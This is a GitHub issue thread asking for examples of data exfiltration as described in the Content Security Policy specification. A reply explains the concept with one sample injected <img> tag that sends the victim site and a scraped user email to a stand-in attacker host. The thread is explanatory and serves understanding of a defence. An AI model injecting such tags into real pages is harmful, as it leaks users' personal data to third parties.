You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Can someone provide me any examples about https://w3c.github.io/webappsec-csp/#exfiltration?
I am still not clear about how exfiltration would occur which contents of the request, such as the URL, contain information about the user or page that should be restricted and not shared.
Can someone please help?
The text was updated successfully, but these errors were encountered:
This type of question is probably better suited for Stack Overflow, but think of an attacker inserting something like <img src=https://someotherdomain/logger?victim=victim.com&user=emailaddressScrapedFromThePageAndInsertedWithJS>.
Can someone provide me any examples about https://w3c.github.io/webappsec-csp/#exfiltration?
I am still not clear about how exfiltration would occur which contents of the request, such as the URL, contain information about the user or page that should be restricted and not shared.
Can someone please help?
The text was updated successfully, but these errors were encountered: